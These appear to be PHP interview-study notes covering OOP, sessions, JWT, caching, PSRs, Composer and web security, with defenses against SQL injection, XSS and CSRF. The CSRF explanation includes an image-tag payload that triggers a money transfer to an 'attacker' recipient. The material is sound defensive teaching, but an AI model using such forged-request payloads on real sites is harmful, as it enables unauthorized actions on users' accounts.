PHP Questions
OOP
Dependency injection: Dependency Injection (DI) is a design pattern that promotes the principle of inversion of control. Instead of an object being responsible for creating its dependencies (like other objects or services it needs), these dependencies are "injected" into the object from the outside, usually via constructor or method arguments.
Benefits:
Improved separation of concerns.
Easier unit testing since dependencies can be mocked.
Decouples classes, leading to more maintainable and flexible code.
Abtract class vs interface
abstract:
class that cannot be instantiated.
abstract and concrete methods
static an non static members
can have constructor
interface:
contract
only methods signatures
can be extended by multiple classes
Composition: Composition involves building complex objects by combining simpler ones. In OOP, this means using instances of other classes as members in your class rather than inheriting from them.
Compose over inheritance:
is the principle that classes should favor polymorphic behavior and code reuse by their composition (by containing instances of other classes that implement the desired functionality) over inheritance from a base or parent class
In the context of PHP and OOP, understanding and applying these principles can lead to more maintainable, flexible, and robust software designs.
Por qué no uso "Herencia" en mi código
Aggretation
final
static
ReflectionClass: is a built-in class in PHP and serves as a core component of PHP's reflection API that helps instrospect classes.
Dynamic Analysis: Useful when you're working with dynamic data or third-party libraries and need to understand the structure.
Automated Testing. testing frameworks use it
Annotations, Dependency Injection Containers, Documentation
Polymorphism: Polymorphism allows objects of different classes to respond differently to the same message.
abstract classes
interfaces
method overriding (run-time)
run-time: when the opcodes are executed
method overloading (compile-time)
compile time in php: script parsed and converted to opcodes
Cookies
Cookies are a mechanism that allows a server to store small pieces of data on a client's system (typically, a browser) so that the data can be retrieved in subsequent requests. This enables functionalities like sessions, user preferences, analytics, and more.
Few Important Points:
HTTP Only: For security, cookies can be marked as "HTTP Only", meaning they're accessible only through the HTTP protocol and not via JavaScript. This helps prevent cross-site scripting (XSS) attack
Secure Cookies: If you're setting cookies containing sensitive data, consider marking them as "Secure", which ensures they're transmitted only over HTTPS:
SameSite Attribute: This attribute controls when cookies are sent to the server. It helps to mitigate CSRF attacks.
Sessions
Sessions in PHP provide a way of maintaining state information about a user's interactions with a website
start session, store data in $_SESSION, retrieve data from $_SESSION, destroy session
Session ID:
When a session starts, PHP generates a unique identifier called the "session ID". This ID is typically stored in a cookie on the user's browser (named
PHPSESSIDby default).On subsequent requests, PHP retrieves the session ID from the cookie and uses it to find and load the corresponding session data from the server.
Session storage: By default, session data is serialized and stored in files on the server
php.ini > session.save_path.Sessions can be stored in databases or caching systems like Memcached or Redis, providing better performance and scalability.
Session security:
Session Hijacking: If an attacker gets access to a session ID, they can impersonate the user. Using HTTPS can prevent session IDs from being intercepted during transit.
Session Fixation: An attacker sets a user's session ID to a known value and waits for the user to authenticate. They can do that by
Embedding a link in a phishing email with the session ID in the URL.
Using Cross-site Scripting (XSS) to set the session ID in the user's cookie.
Techniques like regenerating session IDs upon login can help mitigate this.
Session Timeout: Setting a timeout for sessions can enhance security by limiting the time an attacker has if they gain access to a user's session.
Sessions in distributed systems:
Sticky Sessions: Load balancers can be configured to direct a user to the same server for the duration of their session.
Centralized Session Storage: Any DB
Distributed Session Storage: Systems like Redis Cluster or distributed databases can distribute session data across multiple nodes, ensuring high availability and scalability.
JSON Web Tokens (JWT): Rather than storing user session data on the server, it's encoded into a token that's sent to the client. On subsequent requests, the client sends the token, which the server can verify.
JWT
Definition: JSON Web Token is a way to securely transmitting information over the web.
A JWT typically looks like
xxxxx.yyyyy.zzzzz, consists of three parts:Header: The type of the token, which is JWT, and the signing algorithm.
Payload: The payload contains the "claims" of the token. Claims are statements about an entity (typically, the user) and additional metadata.
Signature: To create the signature part, you have to take the encoded header, the encoded payload, a secret, and then use the algorithm specified in the header to sign it.
For example, if you're using the HMAC SHA256 algorithm, the signature will be:
The tokens are signed either using a private secret or a public/private key.
JWTs are used for authentication and authorization purposes
Advantages:
Statelessness: Since the JWT contains all the information about the user, there's no need for the server to store session data. This allows for scalable applications as there's no need to store session information in memory.
Decentralization: Authentication can be done by any service, as long as they have the appropriate secret or public key.
Performance: Since JWT allows for stateless authentication, there's no need to query a database to check for a valid session every time a user makes a request.
Concerns:
Security: Storing the JWT on the client side, especially in local storage, can lead to vulnerabilities, such as XSS attacks.
Size: JWTs can become large if too much data is stored in them, leading to performance issues in environments where headers should be small, like in mobile development.
State: Since JWTs are stateless, implementing features like blacklisting a token before its expiration can be challenging.
Token Expiry: Since JWTs have expiration claims, systems need to handle token renewal. If a JWT is stolen, it can be misused until it expires.
Caching
PHP
Opcode Caching:
When PHP code is executed, it's first compiled into opcodes, which are then executed by the Zend Engine.
Without caching, these opcodes are discarded after execution, meaning the next time the same PHP script is run, it needs to be compiled again.
Opcode caching retains the compiled opcodes in memory so that they can be reused without recompilation in subsequent runs.
Popular Tools:
OPcache: Integrated and shipped with PHP starting from PHP 5.5. It caches opcodes in memory, reducing the need to reload and parse scripts on each request.
Object Caching:
Used to store objects, database query results, or other data structures.
Useful for reducing the overhead of costly database operations or complex computations.
Popular Tools:
APCu: In memory key value store for php
Memcached: Memory object cache system
Redis:
if the load is very high– we should look towards these solutions (Memcached and redis) since they have a good potential for scaling.
Note that when running PHP as a (Fast-)CGI application inside your webserver, every PHP process will have its own cache, i.e. APCu data is not shared between your worker processes. In these cases, you might want to consider using memcached instead, as it’s not tied to the PHP processes.
Full Page Caching:
Instead of caching small parts or objects, the entire output of a page can be cached.
Reduces the need to execute PHP scripts and database queries entirely for frequently accessed pages.
Can be implemented at the PHP level or using tools like Varnish.
Popular Tools:
Varnish Cache: An HTTP accelerator designed for content-heavy dynamic web sites. It's not PHP-specific but is commonly used with PHP applications.
Database Query Caching: Databases like MySQL have their own built-in query caching mechanisms.
Content Delivery Network (CDN): CDNs can cache static assets (like CSS, JS, and images) closer to the user
Browser Caching:
By setting appropriate HTTP headers, you can instruct the client's browser to cache certain assets locally, reducing the need for repeated downloads.
Security
escaping data: Escaping data means transforming certain characters or sequences of characters into a different format that is recognized as text rather than executable code.
sanitazing data: cleaning user input. Remove or encode harmul content in strings.
SQL Injection:
Description: Occurs when an attacker is able to manipulate a site's database through a form field, URL parameter, or cookie. The attacker can insert malicious SQL statements into these inputs, compromising your database.
would return all the users
Solution: Use prepared statements and parameterized queries. PHP's PDO, or Prepared Statements in MySQLi, automatically takes care of escaping special characters and helps reduce SQL injection risks.
Cross-Site Scripting (XSS):
Description: Attackers inject malicious scripts into content that's then served to users. The browser can't tell the difference between legitimate and malicious scripts, so the malicious script gets executed.
The script captures the user's cookie (which could be used to authenticate a session) and sends it to the attacker's server by changing the location of the document to the attacker's URL, including the cookie as a URL parameter.
Solution: Escape data, validate input, sanitize data, implement Content Security Policy (CSP) headers.
When a CSP is implemented, the browser will not load content or execute script from sources that are not explicitly mentioned in the policy.
Cross-Site Request Forgery (CSRF):
Description: An attacker tricks a user into performing actions they didn't intend to by creating specially crafted hyperlinks or forms. The user might inadvertently submit a form that changes their email address, password, or other sensitive data.
The user logs into
example.com, which uses cookies for authentication. Once the user is logged in, the browser automatically sends the authentication cookie with every request toexample.com.The user, while still logged in, visits
malicious.com. This site has been set up by an attacker to send a request toexample.com— this could be something as simple as an image tag like<img src="<https://example.com/transaction?amount=100&recipient=attacker>">, where the "src" attribute is actually a request to transfer money.The user's browser makes the request to
example.combecause it's just an image tag as far as the browser is concerned. Since the user is authenticated, the browser also includes the authentication cookie forexample.comin the request.The
example.comserver receives the request and can't tell it wasn't intentionally sent by the user — after all, it has the authentication cookie. If the server isn't protected against CSRF, it processes the request and inadvertently performs the transaction on behalf of the user.
To protect against CSRF attacks, it's common to use anti-CSRF tokens.
Solution: Use anti-CSRF tokens. These tokens are random strings that are only known to the user and the server, and they're included in the transmitted data when the client makes an HTTP request, preventing the attacker from replicating the required parameters for a valid request.
Session Hijacking:
Description: An attacker steals a user's browser session cookie, which is used to authenticate the user on a website, and uses this cookie to gain unauthorized access to the user's account.
Solution: Regenerate session IDs after login to prevent session fixation, and periodically regenerate the session ID. Always use secure, HTTP-only cookies. Implement proper session timeout and ensure your application uses HTTPS to prevent session sniffing.
File Inclusion Vulnerabilities:
Description: Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities occur when an application uses user-controllable data in the inclusion of scripts, enabling attackers to run code on the server or client-side.
Solution: Limit the files that can be included in an application, preferably avoiding the practice where possible. Always sanitize and validate user input and avoid using it directly in functions like
include,require,fopen, etc.
Directory traversal: A directory traversal (or path traversal) attack exploits insufficient security validation or sanitization of user-supplied file name. An affected application can be exploited to gain unauthorized access to the file system.
Man in the middle:
Description: type of cyberattack where an attacker intercepts and potentially alters the communication between two parties who believe they are directly communicating with each other.
Solution: https, certiricates updated, use cookies with secure
Database
Migrations: Use doctrine migrations, consider application downtime
Optimize queries: use explain, use indexes, select clauses instead of select *, reduce n+1 queries, limit data retrieved
Prepared statements: Feature provided by many database access libraries, including PHP's PDO (PHP Data Objects) and MySQLi. They allow you to prepare an SQL statement with placeholders, which can later be bound to actual values before executing the query.
Ensure integrity: use strong data types, use constraints, validate data, use preparede statements, backups, logs, monitor and test
Seeding: Fixtures, sqldump
doctrine vs eloquent
Active Record vs. Data Mapper:
Doctrine: Implements the Data Mapper pattern. Here, the persistence logic is decoupled from the domain objects. You work with entities as plain objects, and the ORM takes care of persisting them, often using a separate layer (e.g., EntityManager in Doctrine).
Eloquent: Implements the Active Record pattern. This means that a model instance is directly tied to a database row, and you can perform CRUD operations on the model instance itself.
N+1 in ORM
The N+1 problem is a common performance issue in applications that use an Object-Relational Mapping (ORM) system. It arises when an application inefficiently retrieves related data from a database, leading to an excessive number of queries.
Explanation: Imagine you have two related entities (e.g., Post and Comment). When you want to display all posts along with their comments, the naive and straightforward approach might be:
Fetch all posts.
For each post, fetch its comments.
This leads to 1 query for the posts plus N queries for the comments of N posts, thus the term "N+1".
Without Optimization (N+1 problem):
You execute 1 query to retrieve the 10 blog posts.
You execute a separate query for each of the 10 blog posts to retrieve its comments. (i.e., 10 queries)
So, you end up executing 1 (for the posts) + 10 (for the comments) = 11 queries.
With Optimization (Using eager loading):
You execute 1 query to retrieve the 10 blog posts.
You execute 1 additional query to retrieve the comments for all 10 posts at once.
Now, you only execute 2 queries in total.
How to solve the N+1 problem:
Eager loading
Doctrine (Symfony): You can use DQL's JOIN or add fetch="EAGER" in your mapping.
PSRs
Coding style, autoloading , caching, logging, client, container, event dispatcher
PSR-1: Basic Coding Standard — It specifies the basic coding standards for code styling and namespacing in PHP.
PSR-3: Logger Interface — It describes a common interface for logging libraries, enabling compatibility between different logging implementations.
PSR-4: Autoloader — It improves upon PSR-0, providing a specification for autoloading classes from file paths.
PSR-6: Caching Interface — It specifies an interface for caching libraries, encouraging collaboration and interoperability.
PSR-7: HTTP Message Interface — It describes common interfaces for HTTP messages, as described in the RFC 7230 and RFC 7231, allowing developers to create applications using a standardized method for HTTP requests and responses.
PSR-11: Container Interface — It standardizes the way frameworks and libraries utilize dependency injection containers.
PSR-12: Extended Coding Style Guide — It extends and expands upon PSR-2, providing a more comprehensive coding style guide for PHP.
PSR-13: Hypermedia Links — It offers a standard for hypermedia link definitions used in representations of web-based data systems.
PSR-14: Event Dispatcher — It details the design of event dispatchers, allowing components to interact with each other in a standardized way.
PSR-15: HTTP Handlers — It specifies interfaces for handling server requests and responses, defining how HTTP requests should be handled in server-side PHP.
PSR-16: Simple Cache — It introduces a standardized way to implement caching, simplifying the process across various libraries.
PSR-17: HTTP Factories — It specifies the standard for HTTP message factories, which simplifies the creation of objects defined in PSR-7.
PSR-18: HTTP Client — It standardizes the interface for HTTP clients, promoting interoperability across various PHP HTTP client implementations.
PSR-20: Clock — In Draft - It proposes a consistent way to retrieve the current time, which helps in testing scenarios that use time-sensitive functionality.
Composer
Composer is a dependency management tool for PHP.
1. composer.json: The heart of a Composer-managed project
2. Autoloading: Composer also generates an autoloader file, which helps PHP find and load the classes from the libraries. By including vendor/autoload.php in your PHP script, you can use the libraries without manually including them:
3. Other Commands and Features:
composer require [package-name], composer remove [package-name]composer show: Display detailed information about the installed packages.composer dump-autoload: Regenerate the autoloader files. Useful when you add new classes or change the autoloading configuration.
4. Packagist: Packagist is the default package repository for Composer.
5. Benefits of Composer:
Centralized and Consistent Dependency Management
Autoloading
Semantic Versioning
Magic methods
Predefined methods that are used to perform certain operations based on particular actions.
__construct(): This method is called when an object is created from a class.
Useful for initializing properties or running any code required at the time of object creation.
__destruct(): Called when the object is destroyed or the script execution ends.
Useful for cleanup, like closing database connections.
__get($property): Triggered when trying to access an inaccessible or non-existent property.
Useful for overloading property reads or returning computed values.
__set($property, $value): Triggered when trying to set a value to an inaccessible or non-existent property.
Can be used to enforce property constraints or trigger events when properties are modified.
__call($method, $args): Invoked when an object is attempted to be used as a function or when a non-existent or inaccessible method is called.
Useful for method overloading.
__callStatic($method, $args): Triggered when invoking inaccessible or non-existent static methods.
Useful for static method overloading.
__isset($property): Called by
isset()orempty()for inaccessible or non-existent properties.Helps in checking if a property is set even if it's protected or private.
__unset($property): Called by
unset()for inaccessible properties.Allows custom behavior when unsetting properties.
__toString(): Called when the object is used in a string context (like
echo).Useful to represent the object as a string, for easy debugging or logging.
__clone(): Triggered when the object is cloned using the
clonekeyword.Allows defining custom behavior for when objects are cloned, like deep copying.
__invoke(): Called when a script tries to call an object as a function.
Makes an object callable, which can be handy for creating single-method objects or functors.
__set_state(): Used for classes exported using
var_export().Allows initialization of properties for objects being restored from strings.
__sleep() and __wakeup(): Used for serialization and deserialization respectively.
Customizes the serialization process, determining which properties to save, and initializing resources upon deserialization.
__debugInfo(): Called by
var_dump()when dumping an object.Customizes the properties displayed, useful for hiding or computing debug information.
More
Run PHP
cli, php built in server, serverless php (aws lambda)
mod_php, apache
cgi: old
hhvm: HHVM is a virtual machine developed by Facebook, PHP community responded with its own performance enhancements, starting with PHP 7.
fast-cgi: for both apache and nginx
php-fpm (fastcgi process manager): A PHP FastCGI implementation containing some features (mostly) useful for heavy-loaded sites.
swoole, roadrunner. RoadRunner includes PSR-7/PSR-17 compatible HTTP and HTTP/2 server and can be used to replace classic Nginx+FPM setup with much greater performance and flexibility.
PHP worker
Definition: A process or thread dedicated to executing PHP scripts.
PHP workers are background processes on servers that run PHP code.
"how to tune the number of PHP-FPM child processes" - As many as can fit in memory
Too Few Workers: If you have more incoming requests than available workers, the excess requests will be queued up, waiting for a free worker, leading to slower response times.
Too Many Workers: Conversely, if you configure too many workers, it can result in excessive memory usage, as each worker consumes memory.
It's crucial to avoid long-running tasks because they can tie up a worker, making it unavailable to handle other incoming requests. For long-running tasks, it's a good idea to offload them to a background process or a task queue system like RabbitMQ
PHP stream
PHP streams provide a way to access resources, whether they are files, network resources, or even data in memory, through a consistent and unified interface.
1. Basics of PHP Streams:
Resources: In PHP, a stream is represented by a "resource" data type. When you open a file or establish a network connection, PHP returns a resource that you can operate on using various stream functions.
Wrappers: Wrappers are additional layers around streams that provide access to specific protocols or features. "file://" "http://" or "ftp://"
2. Common Uses of Streams:
File Access: The most common use of streams in PHP is file access. Functions like
fopen(),fread(), andfwrite()use streams.Memory Access: PHP provides a "php://memory" and "php://temp" stream that allows you to treat memory (or temporary file storage) as a stream, making it useful for operations that need an in-memory buffer.
Network Access: You can also use streams to access network resources. For instance, the
file_get_contents("http://example.com")function can be used to fetch a webpage:
You can set context to the stream to configure the behaviour (ie. set the http method) and filter data like stream_filter_append($file, "string.toupper");
Variable types
Scalar Types: Booleans, integers, floats, strings
Compound Types: Array, objects, callable, iterable
Special Types:
Resource: Holds a reference to an external resource, such as a file handle, database connection, etc.
NULL
Pseudo-Types:
Used in the PHP documentation to specify types in certain contexts where a single type does not tell the full story. Examples include
mixed(can be any type),number(can beintorfloat), andcallback(can be any callable).
Types of errors:
Parse Error (Syntax Error), compile error:
These are caused by invalid code syntax.
Throwable > Compiler error > Parse error
Forgetting s “;”
PHP will stop
Fatal Error:
Can't execute the code.
Like type error under throwable
Call an undefined function
PHP will stop
Warning Error:
Can execute the code.
Referring to a file that does not exist.
Notice Error:
These are minor errors
Notices often indicate bad practices, which might not necessarily break the script but could lead to bugs.
It's worth noting that before PHP 7, errors were handled differently. They were reported, but they couldn't be caught using try/catch blocks.
There are sixteen different error levels (i.e. types) are available in PHP.
E_ERROR, E_WARNING, E_PARSE, E_NOTICE, E_CORE_ERROR, E_CORE_WARNING, E_COMPILE_ERROR, E_COMPILE_WARNING, E_USER_ERROR, E_USER_WARNING, E_USER_NOTICE, E_STRICT, E_RECOVERABLE_ERROR, et_error_handler, E_DEPRECATED, E_USER_DEPRECATED, E_ALL
Lazy loading in php
Design pattern in software development where the initialization or instantiation of an object, or the loading of resources, is deferred until it is actually needed.
Common use cases
Database Interaction:
ORM libraries like Doctrine for PHP offer lazy loading for related database entities. If you access an entity's relation (like
$post->getComments()), only then will the comments be fetched from the database.
Object Instantiation:
Instead of creating all objects when the application starts, objects are created only when they are actually accessed.
Autoloading:
PHP's class autoloading mechanism is inherently lazy. Instead of including all class files at the beginning of a request, class files are loaded automatically when a class is used for the first time. This is typically set up using
spl_autoload_register().
Race condition problem
A race condition is a situation where the behavior of a system depends on the relative timing of events
In the context of PHP, which is traditionally single-threaded, race conditions most commonly occur in scenarios involving data storage or shared resources.
Avoiding Race Conditions
Locking
Atomic Operations: Use operations that combine reading and writing into a single uninterruptible step. Many databases provide atomic operations.
API
Api versioning
different urls, different headers, different queries, different host. If sdk’s are provided is easier for clients
Rate limit
Rate limiting is essential to protect your PHP applications from abuse, mitigate DDoS attacks, and ensure fair usage.
Can limit by ip, user account, api token. Per minute, per hour,
Implement using a middleware, that uses redis, or apcu. Use httpheaders to inform (X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Reset)
Respond with 429 Too Many Requests.
API Rate Limiting: Restricts the number of API requests a user can make in a given time period to prevent overuse of resources.
Throttling: Dynamically controls the rate of API requests based on current system load or user-specific limits to maintain server performance and reliability.
Sync vs Async php
Synchronous
Sequential Execution: Each line of code waits for the previous line to complete before it starts.
Blocking: If a line of code (e.g., a database query) takes a long time, the entire script waits for it to finish.
Benefits: simple and consistent
Caveats: Performance, scalability
Asynchronous
Concurrent Execution: Multiple tasks can be initiated and run concurrently, without waiting for each one to finish.
Non-Blocking: Code can initiate a task (like an HTTP request) and then move on to other tasks without waiting for the first task to complete.
Benefits: performance and scalability
Caveats: Complexity, error handling
Examples: ReactPHP, Swoole
When to Use Which?
Synchronous when you have a traditional web application, where the majority of the workload is CPU-bound (processing data, rendering templates) rather than I/O-bound.
Use Asynchronous PHP when you have I/O-bound tasks that can run concurrently, such as: Apis, chats
More (superglobals, @, pdo, store sensitive info, backward compatibility, spl, common bottlentecks, best practices, scale)
Superglobals:
Built-in arrays that provide a way to access information about the environment, input data, and other external factors regardless of the scope.
$GLOBALS, $_SERVER, $_GET, $_POST, $_FILES, $_COOKIE, $_SESSION, $_REQUEST, $_ENV,
@ meaning
@ symbol is used as an error control operator. When it is prepended to an expression in PHP, any error messages that might be generated by that expression will be ignored.
$result = @file_get_contents('nonexistentfile.txt');
it's better to use techniques like exception handling with try-catch
How can you ensure backward compatibility when updating a PHP library or package for public use?
Ensuring backward compatibility (BC) when updating a PHP library or package, especially one used by many others, is critical to prevent disruptions for its users. Here are some guidelines and best practices to follow:
Semantic Versioning (SemVer): Adopt Semantic Versioning. A breaking change should result in a major version bump. Minor and patch version increases should remain backward compatible.
Deprecate Before Removal: If you need to remove a function, method, or class, deprecate it first and only remove it in the next major release. Provide clear warnings about the deprecation.
Document Changes, Automated Tests, composer…
PDO, or PHP Data Objects, is a database access layer that provides a consistent interface for accessing databases. It's a set of classes and interfaces that abstract database access, allowing developers to use the same PHP code to manage different types of databases.
Doctrine uses it
Similar to mysqli but DB agnostic
Timezone: The default timezone for PHP is UTC regardless of your server's timezone.
php buffering: Buffering in PHP refers to the process of storing output in memory (a buffer) before sending it to the client or the browser.
How would you handle sensitive information, like API keys, in a PHP application?
store it in .env files
rotate api keys
encrypt data, database
use secrets (docker secrets)
File uploads: limit file types and size, use random names, store them in a different server
How would you handle long-running processes in PHP, like generating large reports or processing bulk data? RabbitMQ, php-resque, Cli, Cron
Describe the lifecycle of a PHP request. http rquest, server, php, compilation, opcode execution, generates output, send output
What are the common performance bottlenecks in PHP applications?
Database: slow queries, too many queries (eager loading or batch operations), lack indexing
Api calls, file system operations, memory usage (large datasets), lack of caching, network latency
Env variables: serve as a mechanism to inject external configurations into an application, thereby decoupling configuration from code. This decoupling provides several advantages in security, flexibility, scalability (aws, kubernetes..)
What is a polyfill? Piece of code that provides modern functionality on older environments that do not natively support it.
SPL: (Standard PHP Library) is a collection of interfaces, classes, and functions that are bundled with PHP and are aimed at solving common problems.
Here are some of the primary features and components of the SPL:
Data Structures:
SplStack, SplQueue, SplHeap,SplMaxHeap,SplMinHeap,SplFixedArray, SplDoublyLinkedListIterators:
DirectoryIterator, ArrayIterator,RecursiveArrayIterator, FilterIterator,LimitIterator,CachingIteratorExceptions: SPL provides a set of standard Exception classes that can be used or extended for better exception handling in applications:
File Handling: Classes for dealing with file systems and file objects:
SplFileInfo,SplFileObject,SplTempFileObject.
And more
PHP best practices
Coding standards, static analysis like phpstan (check types, undefinded variables), linters (code style), unit testing (phpunit), CI/CD, code review, documentation
Scaling
Vertical (mejorar servidor) vs Horizontal (add servers)
Bottleneck and profiling
Sol: Caching, pooling, paralelization, partitioning (concentrate related proccesses close)
Caching, database (indexing, query, caching, replication, sharding), profiling, cdns, load balancing, ,horizontal scaling, microservices
Sharding distributes data across multiple servers, while partitioning splits tables within one server. Both split the data by ranges, regions, lists.. In many cases, the terms sharding and partitioning are even used synonymously,
Logging and monitoring: Monolog, sentry, new relic, datadog, kibana
PEAR, was instrumental in the early days of PHP for distributing and managing reusable PHP components.
Constants
are case sensitive
global space
define("CONSTANT_NAME", "Value"); const CONSTANT_NAME = "Value";
echo CONSTANT_NAME;
in classes
Hashing
Hashing is a process used to convert data (like a string) into a fixed-length value, which usually appears random.
When a user logs in, the system hashes the entered password and compares it to the stored hash.
Type casting and juggling
Juggling
Front controller pattern: software design pattern often used in web applications. It provides a centralized entry point for handling requests
a private method ensures that if you change it the only code affected it’s in the same class
$ vs $$
Variable scopes
Local, global, static
Context within which they can be accessed or modified.
Local Scope:
Global Scope:
A variable declared outside a function has a GLOBAL scope and can be accessed outside the function but not inside unless globalized.
To use a global variable inside a function, you must use the
globalkeyword.
Static Scope:
Inside a function, the
statickeyword can be used to declare a static variable.Unlike regular local variables, a static variable retains its value between function calls.
FFI: is an extension that allows you to call functions and use data types defined in C libraries directly from PHP code.
Benefits:
Performance: Instead of writing an entire PHP extension in C, developers can leverage existing C libraries directly from PHP, which can lead to performance improvements.
Reusability: Existing C libraries and functions can be reused without the need to write wrappers or reimplement them in PHP.
Flexibility: Allows PHP to interface with lower-level systems, opening up possibilities for integrating with a wider range of systems and technologies.
::
Accessing Static Methods and Properties
Accessing Class Constants
Referencing Overridden Parent Class Members
When overriding class methods in a child class, you can use the
::operator to call the parent class's version of that method.
Middleware
Software in between 2 or more systems/apis.
In symfony you can implemment it decorating services.
example
New in symfony 5.1
Middleware vs Events
Middleware: Linear execution flow. Used for authentication, logging, rate limitin, input validation. Usuarlly invoked before reaching the primary appliciation logic (controllers)
Events: Allow decouple architecture. Sending emails, tigerring background jobs, updating realted data, user registration, after a post saved. Multiple listeners
Last updated
